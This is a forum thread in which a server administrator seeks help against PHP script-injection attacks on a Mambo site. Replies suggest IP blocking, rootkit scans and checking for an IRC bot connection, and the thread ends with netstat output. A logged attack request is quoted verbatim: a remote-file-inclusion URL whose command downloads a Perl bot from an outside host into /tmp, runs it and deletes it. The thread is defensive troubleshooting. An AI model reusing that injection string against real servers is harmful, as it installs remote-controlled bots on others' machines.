php script injections

[Grizzly]

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


Need help advice anything...

Thank you in advance

[sjau]

you could deny the IP of the attacker in a .htaccess

[TheRudy]

Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again..

I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either..

Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..

[edge]

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)

[TheRudy]

Quote:

Originally Posted by edge

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)

You also checked that eh?

[Grizzly]

I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing

66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge.

I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.

[TheRudy]

The script looks like a war bot or how they are called.. They are using known exploid of script (you running Mambo script right?), they google it and then try to inject this script.

Check by running processes (ps) and network connections (netstat) if you are connected to IRC
host: 66.90.88.178
port: 7474

If you are, kill it! and block that port and IP with firewall..

Once you fix this, got to that IRC channel and say to them: I just PWNED YOU!

[Grizzly]

Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 14 [ ] DGRAM 9984 /dev/log
unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log
unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_s ocket2
unix 2 [ ] DGRAM 28905
unix 2 [ ] DGRAM 17548
unix 2 [ ] DGRAM 16934
unix 3 [ ] STREAM CONNECTED 16687
unix 3 [ ] STREAM CONNECTED 16686
unix 3 [ ] STREAM CONNECTED 16683
unix 3 [ ] STREAM CONNECTED 16682
unix 3 [ ] STREAM CONNECTED 16679
unix 3 [ ] STREAM CONNECTED 16678
unix 3 [ ] STREAM CONNECTED 16675
unix 3 [ ] STREAM CONNECTED 16674
unix 3 [ ] STREAM CONNECTED 16671
unix 3 [ ] STREAM CONNECTED 16670
unix 3 [ ] STREAM CONNECTED 16667
unix 3 [ ] STREAM CONNECTED 16666
unix 3 [ ] STREAM CONNECTED 16663
unix 3 [ ] STREAM CONNECTED 16662
unix 3 [ ] STREAM CONNECTED 16659
unix 3 [ ] STREAM CONNECTED 16658
unix 3 [ ] STREAM CONNECTED 16655
unix 3 [ ] STREAM CONNECTED 16654
unix 3 [ ] STREAM CONNECTED 16651
unix 3 [ ] STREAM CONNECTED 16650
unix 3 [ ] STREAM CONNECTED 16647
unix 3 [ ] STREAM CONNECTED 16646
unix 3 [ ] STREAM CONNECTED 16643
unix 3 [ ] STREAM CONNECTED 16642
unix 3 [ ] STREAM CONNECTED 16639
unix 3 [ ] STREAM CONNECTED 16638
unix 3 [ ] STREAM CONNECTED 16635
unix 3 [ ] STREAM CONNECTED 16634
unix 3 [ ] STREAM CONNECTED 16631
unix 3 [ ] STREAM CONNECTED 16630
unix 3 [ ] STREAM CONNECTED 16627
unix 3 [ ] STREAM CONNECTED 16626
unix 3 [ ] STREAM CONNECTED 16623
unix 3 [ ] STREAM CONNECTED 16622
unix 3 [ ] STREAM CONNECTED 16619
unix 3 [ ] STREAM CONNECTED 16618
unix 3 [ ] STREAM CONNECTED 16615
unix 3 [ ] STREAM CONNECTED 16614
unix 3 [ ] STREAM CONNECTED 16611
unix 3 [ ] STREAM CONNECTED 16610
unix 3 [ ] STREAM CONNECTED 16607
unix 3 [ ] STREAM CONNECTED 16606
unix 3 [ ] STREAM CONNECTED 16603
unix 3 [ ] STREAM CONNECTED 16602
unix 3 [ ] STREAM CONNECTED 16599
unix 3 [ ] STREAM CONNECTED 16598
unix 3 [ ] STREAM CONNECTED 16595
unix 3 [ ] STREAM CONNECTED 16594
unix 3 [ ] STREAM CONNECTED 16591
unix 3 [ ] STREAM CONNECTED 16590
unix 3 [ ] STREAM CONNECTED 16588
unix 3 [ ] STREAM CONNECTED 16587
unix 3 [ ] STREAM CONNECTED 16584
unix 3 [ ] STREAM CONNECTED 16583
unix 3 [ ] STREAM CONNECTED 16581
unix 3 [ ] STREAM CONNECTED 16580
unix 2 [ ] DGRAM 16565
unix 2 [ ] DGRAM 13315
unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 13229
unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 13018
unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 12907
unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12905
unix 2 [ ] DGRAM 12902
unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12504
unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 12503
unix 2 [ ] DGRAM 12142
unix 2 [ ] DGRAM 10931
unix 2 [ ] DGRAM 10743
unix 2 [ ] DGRAM 10537
unix 2 [ ] DGRAM 10363
unix 2 [ ] DGRAM 9994
unix 2 [ ] STREAM CONNECTED 9811
unix 3 [ ] STREAM CONNECTED 4968
unix 3 [ ] STREAM CONNECTED 4967

[TheRudy]

Do a netstat -tap
sorry

[Grizzly]

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:mysql *:* LISTEN 3045/mysqld
tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam
tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap
tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http
tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce
tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named
tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named
tcp 0 0 localhost:domain *:* LISTEN 5276/named
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *op3 *:* LISTEN 4531/couriertcpd
tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd
tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork
tcp 0 0 *:ssh *:* LISTEN 4905/sshd
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork